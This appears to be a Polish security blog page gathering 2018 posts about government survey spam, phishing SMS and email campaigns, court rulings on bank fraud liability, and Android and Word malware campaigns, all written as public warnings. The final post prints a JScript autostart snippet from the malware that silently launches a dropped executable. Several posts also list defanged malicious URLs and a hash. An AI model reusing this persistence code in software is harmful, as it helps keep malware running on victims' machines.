Newer posts are loading.
You are at the newest post.
Click here to check if anything new just came in.

July 04 2018

19:03
Gry komputerowe o hackerach
07:39
[Akutalizacja #2] Czy dane ciekną z Profilu Zaufanego? Zdarzały się logowania na nieswoje konta

July 03 2018

00:09
Poważny błąd w smartfonach Samsunga. Telefon “po cichu” wysyła Twoje prywatne zdjęcia losowym znajomym

July 02 2018

19:51
Nie, z DotPay’a nie wyciekają dane klientów
12:57
Zgadnijcie ile naruszeń ochrony danych Polaków zgłoszono do UODO w związku z RODO?

May 18 2018

08:07

Ministerstwo Finansów zaspamowało adresy e-mail 360 000 podatników

Podnoszenie jakości usług świadczonych przez administrację publicznej jest dobre. Masowe rozsyłanie ankiet na adresy podatników kierujących na serwery firm prywatnych… niekoniecznie.

Podejrzany mailing od Ministerstwa Finansów

W ostatnich dniach bardzo dużo osób pisało do nas w sprawie e-maili z Ministerstwa Finansów, które zachęcały do wzięcia udziału w ankiecie dotyczącej systemu e-Deklaracje. Czytelnicy byli oburzeni, że ministerstwo bez pytania przesłało im niechcianą korespondencję, czyli zaspamowało ich skrzynki e-mail.

E-mail rozsyłany przez Ministerstwo Finansów

Co więcej, choć maile były rozsyłane z adresu ankietaPB@mf.gov.pl, przesyłana podatnikom ankieta została stworzona przez Politechnikę Białostocką i zachęcała do otworzenia linku kierującego do ankiety na stronie serwisu Interankiety.pl. Z tego powodu niektórzy z Czytelników, podejrzewali nawet, że e-mail jest próbą ataku phishing i ktoś, kto podszywa się pod Ministerstwo Finansów chce wyłudzać informacje.

Dla tych, którzy całkiem słusznie, obawiali się klikania w linki prowadzące do pozarządowych domen, pokazujemy co kryło się pod linkiem do Interankiety.pl, czyli serwisu prowadzonego przez działalność gospodarczą “sixpoints – Jędrzej Koronowicz”:

Ministerstwo Finansów nie zebrało odpowiedniej zgody

Zacznijmy od tego, że Ministerstwo Finansów nie powinno rozsyłać takiego mailingu. Owszem, miło jest pomagać naukowcom, ale instytucje publiczne działają na zasadach trochę innych niż firmy. Firmy najczęściej mogą robić to, co nie jest zabronione. Instytucje publiczne powinny robić tylko to, do czego zostały powołane i prawnie umocowane. Zauważcie, że w czasie rejestrowania konta na portalu podatkowym (to jedna z form składania e-deklaracji) wyświetlana jest poniższa informacja.

Portal podatkowy ma służyć do kontaktu, ale w celu załatwiania spraw urzędowych. Podatnik wyraża zgodę na otrzymywanie informacji dotyczących swojego profilu. Nie widzimy tutaj zgody na otrzymywanie innej korespondencji (np. związanej z badaniami naukowymi). Dlatego właśnie wielu naszych Czytelników nazwało tę korespondencję “zwykłym spamem” i trudno się z nimi nie zgodzić.

Co na to Ministerstwo Finansów?

Spytaliśmy o sprawę Ministerstwo Finansów. Odpisał nam “Wydział prasowy”. Chcieliśmy wiedzieć m.in. kto był inicjatorem badania i dowiedzieliśmy się, że “inicjatorem była Politechnika Białostocka“. To samo w sobie mogłoby być impulsem do dalszych pytań np. “co musiałbym zrobić, aby MF wypromowało moje badania?“. Wiemy, że różni ludzie na uczelniach robią bardzo ciekawe badania ;-)

Zresztą, my też byśmy chcieli, tak jak Pani dr hab. Joanna Ejdys, prof. nzw. przeprowadzić badanie np. na temat świadomości użytkowników e-deklaracji w zakresie bezpieczeństwa IT ze szczególnym uwzględnieniem rozpoznawania phishingu wyłudzającego dane w imieniu instytucji rządowych. Czy Ministerstwo umożliwiłoby nam taki darmowy mailing? Mamy naprawdę świetny pomysł na akcję edukacyjną!

Z odpowiedzi Ministerstwa Finansów dowiedzieliśmy się także, że…

Rozesłano ok. 360 tys. wiadomości mailowych i na dzień 15 maja 2018 wpłynęły 1932 odpowiedzi. Ministerstwo nie planuje kontynuacji wysyłki mailowej do kolejnych podatników ze względu na osiągnięcie minimalnego progu zapewniającego reprezentatywność próby wypełnionych ankiet. [MF] nie planuje też podobnych akcji mailingowych w przyszłości. Badanie zaplanowano jako jednorazowe, (…) celem było zbadanie satysfakcji podatników z funkcjonalności systemu e-Deklaracje, a wyniki posłużą do udoskonalenia systemu.

Ministerstwo Finansów zastrzegło sobie dostęp do wyników w postaci wypełnionych ankiet oraz do “danych mailowych”, jednak wyniki zostaną przekazane Politechnice “tylko w postaci zagregowanej”. Firma “sixpoints – Jędrzej Koronowicz”, jako serwis Interankiety.pl, ma jednak do nich pełny dostęp.

Spytaliśmy też Ministerstwo, czy jego zdaniem bezpiecznie jest rozsyłać do wielu osób e-maile zachęcające do klikania w jakiś link.

Informacja o przeprowadzonym badaniu, jego terminie, nazwie skrzynki wyjściowej oraz zawartości rozsyłanych wiadomości została umieszczona na stronie Ministerstwa Finansów, zatem w przypadku pojawienia się jakichkolwiek wątpliwości po stronie odbiorcy wiarygodność otrzymanej wiadomości można zweryfikować.
https://www.e-deklaracje.gov.pl/web/bip/ministerstwo-finansow/wiadomosci/komunikaty/-/asset_publisher/6Wwm/content/podatnicy-otrzymaja-ankiete-dot-systemu-e-deklaracje?redirect=https%3A%2F%2Fwww.e-deklaracje.gov.pl%2Fweb%2Fbip%2Fministerstwo-finansow%2Fwiadomosci%2Fkomunikaty%3Fp_p_id%3D101_INSTANCE_6Wwm%26p_p_lifecycle%3D0%26p_p_state%3Dnormal%26p_p_mode%3Dview%26p_p_col_id%3Dcolumn-2%26p_p_col_count%3D1%26p_r_p_564233524_tag%3Dbud%2525C5%2525BCet#p_p_id_101_INSTANCE_6Wwm_

To bardzo dobry pomysł na “potwierdzenie” że rozsyłane e-maile są wiarygodne. Ale czy ktokolwiek z odbiorców o tym wiedział? Chyba nie, bo nasi Czytelnicy nie byli w 100% pewni, czy korespondencja pochodziła od ministerstwa i chyba większości z nim nie przyszło do głowy, żeby szukać powyższej notatki.

Co ciekawe, nawet w tym oficjalnym komunikacie — zapowiedzi badania — znalazło się zdanie, które sugeruje, że ministerstwo było świadome pewnego ryzyka:

Jednocześnie informujemy, że wiadomości nie będą zawierać żadnych wezwań do zapłaty podatku, ani załącznika w formie pliku.

Napiszemy tylko krótko, że administracja publiczna nie powinna świadczyć usług mailingu dla żadnego podmiotu, nawet przy badaniach naukowych czy akcjach charytatywnych. Jeśli jakiś urząd musi to robić (a uważamy, że każdy powinien sprawdzać “zaufanie do technologii informatycznych” i ulepszać swoje usługi, wsłuchując się w głos “petentów”), to powinien po prostu wcześniej uzyskać zgody obywateli. I najlepiej badanie przeprowadzić na swoich serwerach, a nie serwerach firmy trzeciej.

Przeczytaj także:

<!-- Similar Posts took 5.983 ms -->

May 15 2018

19:48

* Allegro rozesłało e-maila o RODO na dziwne adresy e-mail

Wielu czytelników zgłasza nam dzisiaj, że odebrało fałszywy e-mail od Allegro. E-mail nie jest jednak fałszywy i pochodzi od Allegro, ale — i to jest powodem traktowania go jako “atak” przez naszych czytelników — wiadomość, która zachęca do otworzenia załącznika PDF jest rozsyłana na adresy, na które nasi Czytelnicy nie mają założonych kont w Allegro.

From: Allegro powiadomienia-rodo@allegro.pl
Date: wt., 15 maj 2018, 18:03
Subject: Informacje o Twoich danych osobowych w Allegro

Dzień dobry
Każdy e-mail od Allegro zawiera Twoje imię i nazwisko *
Już 25 maja zaczną obowiązywać nowe przepisy o ochronie danych osobowych.
W związku z tym przygotowaliśmy dla Ciebie niezbędne informacje, które znajdziesz w pliku PDF, dołączonym do tej wiadomości. Dowiesz się z niego, w jaki sposób przetwarzamy Twoje dane osobowe oraz jakie masz związane z tym prawa.
Dziękujemy, że jesteś z nami, i życzymy udanych transakcji na Allegro!
Pozdrawiamy,
Zespół Allegro

Zdarza się też, ze ten e-mail przyjdzie na adres w domenie firmowej (choć odbiorca ma konto na Allegro niezałożone ze skrzynki firmowej, a prywatnej, w innej domenie).

Allegro wita się z odbiorcami po imieniu i nazwisku. Skądś więc Allegro posiada poprawne dane właściciela adresu e-mail, na którego nie jest założone konto w serwisie.

Ale żeby było śmieszniej, nie zawsze to imię i nazwisko jest poprawne…

Może więc dane są zaciągane z jakichś “zbiorów” stworzonych/pochodzących z systemów sprzedawców?

Poprosiliśmy Allegro o komentarz w tej sprawie i jeśli dowiemy się skąd poza e-mailami przypiętymi do kont pochodziły e-maile na które serwis wysłał mailing związany z RODO, zaktualizujemy ten artykuł.

Przeczytaj także:

<!-- Similar Posts took 5.273 ms -->

18:44

* A tak się frauduje Polaków (i nie tylko) w Wielkiej Brytanii

Jeden z naszych Czytelników na emigracji podesłał nam SMS-a jakiego dostał:

Link prowadzi do strony:

http://hmrc-revenue.govs.uk.claim-tax-refund.overview.revmn[.]net/

Pod którą jest formularz zwrotu (bez https, na totalnie podejrzanej domenie) proszący pod koniec o dane karty. I już jest jasne na czym polega scam:

Jak widać, nasi rodzimi cyberzłodzieje są lepsi. O ile mają tak samo nieżyciowe nazwy domen, to przynajmniej serwują je już w większości po https. Co ciekawe, być może ofiarami tego scamu będą właśnie emigranci? Nowy kraj, skąd mają wiedzieć jak wygląda zwrot podatku? “Może te dziwne Brytyjczyki zwracają funty na kartę?”. Ostrzeżcie więc na wszelki wypadek swoich bliskich przebywających w kraju podwójnych kranów w umywalkach.

PS. Są chętni na wykład “Jak się nie dać zhackować?” w Londynie? Ktoś z Was ma zinwigilowane tamtejsze kółka polonijne? Z chęcią byśmy podlecieli (póki UK jeszcze jest w Unii) i pouczyli bezpiecznego korzystania z komputerów naszych rodaków na emigracji :)

Przeczytaj także:

<!-- Similar Posts took 7.385 ms -->

11:27

Sąd Najwyższy: Bank ma oddać ukradzione 60 000 bo nie udowodnił “niedbalstwa” klienta

Jeśli pieniądze z waszego konta znikną w tajemniczych okolicznościach, bank nie będzie chętny do pokrywania straty. Bank nie ma też obowiązku blokować każdej dziwacznej transakcji. W jednej z takich spraw wypowiedział się Sąd Najwyższy i to na korzyść klientki banku. Przy okazji warto przypomnieć o innych sprawach, gdzie bank zarzucał klientowi tzw. “rażące niedbalstwo”, ale sąd ostatecznie kazał zwracać pieniądze.

Co robić, kiedy okradną Ci konto w banku?

Niedawno przez media i Wykop przewinął się temat wyroku Sądu Najwyższego, który dotyczył odpowiedzialności banku za “internetową kradzież”. Sprawa została potraktowana jako nowość, ale ten wyrok zapadł już 18 stycznia. Gdybyście szukali sygnatury to jest ona następująca: V CSK 141/17 (niestety wiele mediów nie podaje nawet daty wydania wyroku, o sygnaturze już nie wspominając).

Ofiara grupy przestępczej

Tło sprawy było następujące. Pewna kobieta w styczniu 2015 roku zawarła umowę z bankiem i umowa ta obejmowała dostęp do bankowości elektronicznej. Kilka miesięcy później (dokładnie 5 maja 2015) logując się do usługi kobieta zobaczyła komunikat o tym, że strona jest w trakcie przebudowy.

Powódka po jakimś czasie podjęła kolejne próby logowania, lecz również ze skutkiem negatywnym. W dniu 7 maja 2015 r. ok. godz. 19:00 powódka zalogowała się (…)  i stwierdziła, że na jej koncie bankowym nie ma pieniędzy. W dniu 5 maja 2015 r. system CUI (Centrum Usług Internetowych – red.) zarejestrował o godzinie 14:41:03 poprawne logowanie z adresu IP […], a następnie o godz. 14:43:31 błędne logowanie z adresu IP […]. Kolejne logowania miały miejsce w dniu 7 maja 2015 r. z adresu IP komputera powódki, przy czym cztery pierwsze z nich były błędne, a ostatnie o 19:05:27 poprawne. Powódka, po stwierdzeniu, że na jej rachunku brakuje spornej kwoty, powiadomiła o tym pozwanego.

“Sporna kwota” w tej sprawie to było ponad 60 tys. zł. Sprawa trafiła do Sądu Rejonowego. Ten ustalił, że…

…nieustalona osoba. z wykorzystaniem logowań powódki na podsuniętej jej umiejętnie stronie, dokonała zlecenia przelewu kwoty 60 981 zł z konta powódki na rachunek M.C. w „C” S.A.

Tą samą sprawą zajęła się jedna z prokuratur apelacyjnych. Ustalono, że kobieta padła ofiarą zorganizowanej grupy przestępczej, która zajmowała się kradzieżą pieniędzy z kont bankowych i transferowaniem tych środków na Ukrainę. Postępowanie objęło 134 podejrzanych.

Dodajmy jeszcze, że na zlecenie Banku przeprowadzono (w dniu 10 czerwca 2015 r.) sprawdzenie komputera kobiety pod kątem oprogramowania i historii logowania do banku.

Bank: To wina klientki!

Tak czy owak kobieta złożyła reklamację, którą bank odrzucił. Rozpatrujący sprawę Sąd Rejonowy uznał, że pracownicy Banku wcale nie musieli wychwycić dziwnego logowania, które nastąpiło z innego adresu IP niż zwykle używany przez powódkę. Pracownicy banku nie musieli też – zdaniem sądu – potwierdzać przelewów telefonicznie (a zauważcie, że z konta w krótkim czasie wypłynęło sporo pieniędzy). Sąd Rejonowy uznał, że to powódka zachowała się niezgodnie z zasadami bezpieczeństwa choć… nie bardzo wiadomo na czym to niewłaściwe zachowanie miałoby polegać.

“To jej wina” – klasyczna wymówka

Apelacja i skarga kasacyjna

Sprawa trafiła do Sądu Okręgowego, który wydał swój wyrok w roku 2016. Sąd Okręgowy uznał, że Sąd Rejonowy powinien wziąć pod uwagę przepisy zawarte w Ustawie o usługach płatniczych. Powołując się na tę ustawę SO stwierdził, że transakcja dokonana na rachunku powódki nie była autoryzowana, gdyż została wykonana przez osobę nieuprawnioną. Jeśli zaś klientka dopuściła się “rażącego niedbalstwa” i przez to miałaby ułatwić sprawę złodziejom, bank powinien to rażące niedbalstwo udowodnić.

Bank wniósł skargę kasacyjną, zaskarżając wyrok Sądu Okręgowego. W ten sposób sprawa trafiła do Sądu Najwyższego.

Sąd Najwyższy: Bank ma udowodnić “rażące niedbalstwo”

Sąd Najwyższy  oddalił skargę kasacyjną. Uznał, że bank powinien udowodnić, że jego klientka dopuściła się rażącego niedbalstwa. Najlepiej przytoczmy tutaj fragment uzasadnienia.

W niniejszej sprawie nie ma podstaw do przyjęcia, że powódka naruszyła obowiązek korzystania z instrumentu płatniczego (…) Do utraty pieniędzy z rachunku bankowego powódki nie doszło bowiem w okolicznościach opisanych w przytoczonych przepisach, ale wskutek popełnienia przestępstwa przez nieustaloną osobę trzecią, która skorzystała z niewłaściwego zabezpieczenia przez Bank świadczenia usługi CUI.

Dostawca jest obowiązany udowodnić inne okoliczności wskazujące na autoryzację transakcji płatniczej przez płatnika albo okoliczności wskazujące na fakt, że płatnik umyślnie doprowadził do nieautoryzowanej transakcji płatniczej, albo umyślnie lub wskutek rażącego niedbalstwa dopuścił się naruszenia co najmniej jednego z obowiązków, o których mowa w art. 42.

Podobne wyroki

“Rażące niedbalstwo” to kluczowy termin przy tego typu sprawach. Tylko czym jest “rażące niedbalstwo”?

W czerwcu 2016 r. pisaliśmy o wyroku dotyczącym kobiety, która ustawiła datę urodzenia jako PIN. Choć takie zachowanie trudno uznać za ostrożne to zdaniem sądu nie było to “rażące niedbalstwo”. Bank musiał zwrócić znaczną część ukradzionych pieniędzy.

Co jeszcze może być “rażącym niedbalstwem”? Czy będzie nim noszenie karty w portfelu schowanym tylko w kieszeni? A może ustalenie wysokich limitów wypłat może być “rażącym niedbalstwem”? Na to pytanie odpowiada inny ciekawy wyrok wydany 18 lipca 2016 przez Sąd Rejonowy w Gliwicach (sygn. akt I C 2524/14).

Tło sprawy: mężczyzna wybrał się na wakacje do Grecji. Tam niestety skradziono mu portfel, w którym mężczyzna przechowywał karty, dowód osobisty, prawo jazdy i gotówkę. Do kradzieży prawdopodobnie doszło rano, ale mężczyzna zorientował się dopiero wieczorem. Niestety już na infolinii banku dowiedział się, że z jego konta wypłacono 12.054,98 zł. Wszystkich transakcji dokonano za pomocą karty i tylko pierwsza próba podania PIN była nieudana. Później nastąpiła seria wypłat.

Mężczyzna uznał, że bank powinien oddać mu pieniądze. Tymczasem bank zarzucił mężczyźnie brak ostrożności. Skoro PIN został “złamany” tak szybko to – zdaniem banku – gdzieś w portfelu musiała być informacja wskazująca na ten PIN. Poza tym mężczyzna zbyt późno zorientował się, że został okradziony. Zdaniem banku nieostrożne było także trzymanie kart w kieszeni krótkich spodenek i nieograniczenie limitów transakcji przed wyjazdem za granicę.

Zgadnięcie PIN-u jest… prawdopodobne (1:3333)

Sąd uznał, że mężczyzna nie wykazał się niedbalstwem. Nie można bowiem domniemywać, że skoro ktoś “trafił” PIN to ten numer musiał być gdzieś zapisany.

Należy zauważyć, że kod do karty składa się z czterech cyfr, zatem występuje 10.000 kombinacji (od kodu: 0000 do kodu 9999). Uwzględniając możliwość trzykrotnej próby do zablokowania karty, prawdopodobieństwo trafienia kodu wynosi w ocenie Sądu 1:3333, a nie jak wskazywał biegły i pełnomocnik strony pozwanej. Nie jest to przecież sytuacja niemożliwa do zaistnienia.

Sąd nie zgodził się również, że mężczyzna miał obowiązek ustalić niższe limity wypłat. Skoro przebywał daleko od domu to mógł nagle potrzebować dużej gotówki. Poza tym nie można uznać, że ustalenie wyższego limitu jest “rażącym niedbalstwem”. Sam bank nie widział nic niepokojącego w tym, że jego klient nagle wypłaca 12 tys. złotych w Grecji.

Noszenie karty w kieszeni spodenek też nie było niedbalstwem. Niedbalstwem byłoby np. pozostawienie karty na stole w restauracji. Jeśli jednak ktoś chronił kartę jak mógł (trzymał ją w kieszeni) a złodziej naruszył prawo kradnąc tę kartę to trudno mówić o niedbalstwie ze strony posiadacza karty.

Dorzućmy jeszcze fragment z uzasadnienia wyroku.

Ciężar udowodnienia, że transakcja płatnicza była autoryzowana przez użytkownika lub że została wykonana prawidłowo, spoczywa na dostawcy tego użytkownika. Wykazanie przez dostawcę zarejestrowanego użycia instrumentu płatniczego nie jest wystarczające do udowodnienia, że transakcja płatnicza została przez użytkownika autoryzowana. Dostawca jest obowiązany udowodnić inne okoliczności wskazujące na autoryzację transakcji płatniczej przez płatnika albo okoliczności wskazujące na fakt, że płatnik umyślnie doprowadził do nieautoryzowanej transakcji płatniczej, albo umyślnie lub wskutek rażącego niedbalstwa dopuścił się naruszenia co najmniej jednego z obowiązków, o których mowa w art. 42.). Okoliczności tych pozwana nie wykazała – czytamy w uzasadnieniu

Rozumowanie Sądu Okręgowego było tu podobne jak rozumowanie SN ze sprawy przywołanej na początku. W tym drugim przypadku sąd zasądził od banku na rzecz mężczyzny kwotę 11.434,87 zł. Zaistniała bowiem sytuacja o jakiej mowa w treści art. 46 ust. 2 pkt 1 Ustawy o usługach płatniczych. Płatnik odpowiadał za transakcje nieautoryzowane do kwoty 150 euro według kursu NBP z dnia kradzieży (150 x 4,1341 zł), tj. do kwoty 620,11 zł. Pozostałą kwotę bank ma oddać.

Banki mają technologie antyfraudowe i powinny ponosić odpowiedzialność za fraudy, ale…

Przytoczone powyżej wyroki są dobre i potrzebne. Banki wymuszają na ludziach, którzy niekoniecznie “urodzili się ze smartfonem w ręku i dostępem do internetu” korzystanie z komputera jako w zasadzie jedynego sprawnie działającego kanału dostępu do ich pieniędzy. Każą ludziom używać technologii — która nie jest w pełni zrozumiała, jednocześnie niewiele robiąc aby klienta wyedukować i uczulić na ataki, pokazać poprawny sposób postępowania i upewnić się, że klient rozumie.

Nie ma (niestety!) “egzaminów” przed uzyskaniem dostępu do serwisu internetowego banku. To powoduje, że nawet ludzie techniczni, nienadążający za wciąż nowymi formami ataków komputerowych, tracą pieniądze (znamy takie przypadki!). Często są to oszczędności całego życia. A najgorzej mają osoby starsze, mniej techniczne, zmuszone przez bank do korzystania z komputera aby zarządzać swoim kontem. Kontem, na którym mają oszczędności całego swojego życia. Jedno przeoczenie i zarabiane przez lata pieniądze znikają bez śladu, a bank mówi:

Twoja wina babciu! Powinnaś wiedzieć, co to jest phishing i zauważyć, że w domenie banku zamiast litery k była litera ķ.

Skoro banki “zamykają marmurowe oddziały” i zmuszają klienta do korzystania z niezrozumiałej technologii to powinny brać odpowiedzialność za to, że mniej techniczni ludzie klikają w co popadnie i się infekują. To powinien być problem banków i to one powinny myśleć nad tym jak podnosić świadomość klientów i uodparniać ich przed atakami. Wina za fraud powinna leżeć po stronie banku, jeśli nie udowodni on, że odpowiednio skutecznie uczulił klienta na zagrożenia. Ale przez uczulenie nie rozumiemy zapisu maczkiem na siódmej stronie regulaminu będącego załącznikiem do 20 stronnicowej umowy. Dziś do klienta banki mogą skutecznie dotrzeć na wiele sposobów. Niestety póki co, większość banków, tego typu możliwości skutecznego dotarcia wykorzystuje jedynie w trakcie prób sprzedaży kredytów lub ubezpieczeń, a nie edukacji związanej z bezpieczeństwem. Choć są drobne wyjątki oczywiście, bo istnieją w Polsce banki, które otwarcie w mediach mówią o atakach, ostrzegają przed nimi i starają się na nie uczulać klientów (brawo mBank!).

Żeby nie było, że jesteśmy tylko po stronie ofiar… Uważamy, że nie zawsze banki powinny całą winę brać na siebie i zwracać pieniądze każdej ofierze fraudu. Jedną z klarownych sytuacji, kiedy w 100% winny jest klient jest kradzież “autoryzowana” przez klienta wynikająca z tego, że klient nie przeczytał SMS-a, w którym było napisane, że autoryzowany jest nie przelew, a dodanie odbiorcy zaufanego. To w naszej opinii jest rażące niedbalstwo. Z tym, że odmowa zwrotu wykradzionych środków powinna dotyczyć tylko tych klientów, którzy wcześniej przeszli przez “samouczek” lub inną ścieżkę edukacji, gdzie było napisane:

DOKŁADNIE CZYTAJ SMS-Y Z BANKU, TAM ZAWSZE* JEST NAPISANE CO POTWIERDZASZ.

W wielu bankach klientom nie zapewnia się tej wiedzy przy otwieraniu konta… Ba! Jak wynika z rozmów z uczestnikami naszych wykładów “Jak nie dać się zhackować?” — wiele osób nie wie nawet, że może sobie ustawić limity na koncie albo szyfrowanie wyciągów, czy powiadomienia SMS o transakcjach wychodzących… Dlatego każdego, kto płaci przez internet, zachęcamy do lektury naszego artykułu pt. 6 rad, jak bezpiecznie wykonywać przelewy przez internet.

* — tak, wiemy, że nie dotyczy to każdego banku. Na marginesie, jeśli nie zauważyłeś przy którym zdaniu umieściliśmy gwiazdkę, to jesteś jak ofiara bankowego fraudy. One też “nie zauważają”, czasem mniejszych różnic niż ta duża gwiazdka w adresie domeny, czasem większych niż ta gwiazdka różnic w numerze rachunku na który wysyłają przelew. Nie przejmuj się, to zdarza się każdemu. Warto jednak, abyś podniósł swoją czujność i wiedzę w zakresie phishingu.

Przeczytaj także:

<!-- Similar Posts took 9.055 ms -->

May 12 2018

06:15

Masz Androida? Uważaj na SMS-y o blokadzie telefonu z powodu RODO

Wreszcie jakiś kreatywny atak, a nie tylko “bony z Biedronki“. Jeden z naszych Czytelników otrzymał wczoraj SMS-a z numeru INFO, w którym ktoś podszywając się pod “Operatora” (w domyśle GSM) informuje o konieczności zainstalowania certyfikatu “LTE 5+” …ze względu na wejście w życie ustawy RODO.

W zycie weszla nowa ustawa RODO. Masz 2 dni na zainstalowanie certyfikatu LTE 5+. W przypadku braku wgrania certyfikatu wszystkie polaczenia przycodzace (sic!), wychodzace jak i internet zostana zablokowane. Instrukcja w linku: http://vrte462[.]com/nieblokuj/
Operator

Po wejściu na stronę, ofiara przez widzi taką instrukcję:

…ale nie zdąży się z nią zapoznać, bo sekundę później strona automatycznie próbuje pobrać na telefon złośliwą aplikację na Androida o nazwie app.apk (MD5: 5263eca3921fb2fdf09401774968666d)

Złośliwa aplikacja prosi podczas instalacji m.in. o takie, niepokojące uprawnienia jak:

    Możliwość lokalizacji
    Odczytywanie kontaktów
    Tworzenie i wysyłanie SMS-ów
    Tworzenie i odczytywanie plików na urządzeniu
    Dostęp do poczty głosowe
    Możliwość wykonywania połączeń telefonicznych

I miejmy nadzieję, że prośba o takie uprawnienia wyda się każdemu podejrzana i zniechęci do instalacji. Na szczęście szczęście o godz. 8:00 dziś aplikacja jest już rozpoznawana jako złośliwa przez 27/60 antywirusów.

Ciekawy to atak, ale…

W tej kampanii jest kilka ciekawostek:

1. Jest to pierwszy atak nakłaniający do złego pod pretekstem wchodzącej w życie ustawy RODO. Każdy o niej słyszał, każdy się jej boi, prawie nikt jej nie rozumie. A więc jest to idealnie enigmatyczny pretekst do wymuszania “działań”. Zwłaszcza, że na skrzynki Polaków od początku maja spływa masa regulaminów, które trzeba potwierdzić bo inaczej zablokują konto (por. Wyraź zgodę albo skasujemy ci konto) albo każą płacić. Przestępca co prawda pisze, że ustawa już weszła, więc tym zdaniem pewnie ochroni prawników i informatyków przed infekcją.

2.Atak dotyczy tylko Androida. I w zasadzie tylko tych jego naiwnych użytkowników, którzy zastosują się do instrukcji zezwolenia na instalowanie aplikacji z nieznanych źródeł. Nigdy tego nie róbcie. Czym to grozi opisaliśmy w tekście Jak przestępcy ukradli 10 000 PLN miłośnikowi kryptowalut przez mobilną aplikację.

Znów wychodzi na to, że korzystanie z iPhone (i Google Chrome) jest najbezpieczniejsze dla przeciętnego użytkownika pod kątem ryzyka infekcji złośliwym oprogramowaniem. Na iPhonie w zasadzie nie da się zainstalować złośliwej aplikacji. Aplikacje wgrywane do sklepu Apple (w zasadzie jedyna droga instalacji dla zwykłego użytkownika) przechodzą o wiele dokładniejszą weryfikację niż aplikacje wgrywane do sklepu Google.

3. Atak ma niższą skuteczność niż mógłby mieć przez automatyczne wywoływanie pobierania aplikacji po wejściu na stronę. Ofiara nie zdąży się zapoznać z treścią instrukcji jak zainstalować “certyfikat”. To miły gest przestępcy. W dodatku wersja “desktopowa” przeglądarki Chrome już blokuje plik .apk jako złośliwy (co ciekawe, wersja mobilna nie).

4. Za atakiem stoją Polacy? Atak jest przygotowany prawie idealnym językiem polskim, ale w kodzie strony pozostało kilka błędów wskazujących na poprzednie kampanie, m.in. odwołanie do domeny dpplatnosc[.]pl wykorzystywanej do oszustw na “lewego Dotpay’a“, które ostatnio w unowocześnionej wersji są znów aktywne na OLX w wariancie “na kuriera”.

5. Znów akcja na weekend. Pierwsze ślady złośliwego pliku jakie udało nam się namierzyć pochodzą z wczoraj (11 maja 2018, z godz. 16.00), a więc już standardowo, złośliwa kampania została odpalona na weekend. Obniża to skuteczność na telefonach firmowych, ale utrudnia analizę i “odkręcenie” oszustw, które zostaną wykonane w trakcie weekendu. Infolinie banków i operatorów nie pracują tak sprawnie, jak mogłyby i ofiary z reguły mają mniejsza możliwość działania. Zwłaszcza, że zbliża się niedziela “niehandlowa”.

Jak bezpiecznie korzystać ze smartfona?

Na koniec przypomnijmy “ABC” bezpiecznego korzystania ze smartfona, które pasują do tej kampanii i które powtarzamy na naszych wykładach pt. “Jak nie dać się zhackować?

  • Nie zezwalaj na instalacje aplikacji spoza zaufanych źródeł
  • Zawsze przeglądaj uprawnienia o jakie prosi aplikacja. Jeśli coś jest podejrzane (np. dostęp do SMS-ów przez latarkę, albo do lokalizacji przez kalkulator), nie instaluj aplikacji
  • Jeśli nie masz wiedzy technicznej i 1300 złotych, to kup sobie iPhona i miej święty spokój. Wytrzyma dłużej niż tanie Androidy, a jest znacznie bezpieczniejszy

Jeśli chciałbyś poznać więcej rad i sposób w jaki przestępcy próbują okradać/infekować Polaków, to zapraszamy na nasze wykłady w przyszłym tygodniu w największych polskich miastach:

Dowiedz się jak poprawnie❗zabezpieczyć swoje dane przed hackerami i jak bezpiecznie używać internetu (na smartfonie i komputerze) do 💶 bankowości oraz 🛍zakupów online. Przyjdź na nasz wykład a pokażemy Ci najpopularniejsze ataki, jakie czyhają na Polaków i nauczymy Cię jak się przed nimi ochronić. Wiedzę przekazujemy z humorem i językiem zrozumiałym dla każdego. Aby się zarejestrować i przeczytać opinie tych, którzy już byli na tym wykładzie, kliknij tutaj!

Najbliższe terminy wykładu:

IOC dla tej kampanii

Domena:
vrte462.com (IP: 206.189.118.234 - DigitalOcean)
Registry Domain ID: 2261722704_DOMAIN_COM-VRSN
Creation Date: 2018-05-09T19:23:23Z
Name Server: DNS1.BACLOUD.COM
Name Server: DNS1.LAISVAS.LT
Name Server: DNS2.BACLOUD.COM
Name Server: DNS2.LAISVAS.LT

Malware:
app.apk
MD5: 5263eca3921fb2fdf09401774968666d

Jak wynika z analizy w sandboksie, próbuje łączyć się z URL: https://sdsdsdsdaas[.]tk/wouldthrough/.

Przeczytaj także:

<!-- Similar Posts took 8.469 ms -->

May 11 2018

08:14

Uwaga na fałszywe potwierdzenia wpłaty rozsyłane e-mailem!

Od 2 dni otrzymujemy wzmożone zgłoszenia od Czytelników, do których ktoś z adresu e-mail “payu2018@dfirma.pl” przesłał potwierdzenie wpłaty za rzekomo wystawioną w maju fakturę. Załącznik (dokument Worda) jest złośliwy i po otworzeniu infekuje komputer ofiary złośliwym oprogramowaniem.

Tak wygląda e-mail:

A tu jego nagłówki:

Received: from smtp8.dhosting.pl (smtp8.dhosting.pl [195.88.50.182])
(using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits))
(No client certificate requested)
Thu, 10 May 2018 05:40:19 +0200 (CEST)
Received: from WINK10FKIHDVOV (unknown [185.125.230.110])
(Authenticated sender: payu_2018@dfirma.pl)
by smtp-2.dpoczta.pl (smtp-2.dpoczta.pl)

W zwiazku z nasza rozmowa telefoniczna dokonalismy transferu na panstwa konto 80,000 zl
(osiemdziesiat tysiecy zloty) jest to oplata faktury wystawionej przez Panstwa firme dnia 2018.05.08
Zalaczam potwierdzenie dokonania wplaty jeszcze dzis zadzwonimy do Panstwa
w celu potwierdzenia otrzymania srodkow.

Pozdrawiam Ksiegowosc Beta Prus

nr tel 605 437 458

Po otworzeniu, złośliwy załącznik wykorzystuje podatność CVE-2017-11882 w Wordzie (a dokładniej jego edytorze równań) i pobiera z adresu http://uploadtops[.]is/1//f/RY2Npnj złośliwy plik Protected.exe (VirusTotal), zmienia jego nazwę na losową i dopisuje do autostartu plik .js, który gwarantuje uruchamianie złośliwego pliku po restarcie:

try { geRteP=new ActiveXObject("WScript.shell"); bLyrUIIY=geRteP.ExpandEnvironmentStrings("%appdata%"); geRteP.run("cmd /c start "+bLyrUIIY+"\\"+"raaQlJgepG.exe",0); } catch(e) { }

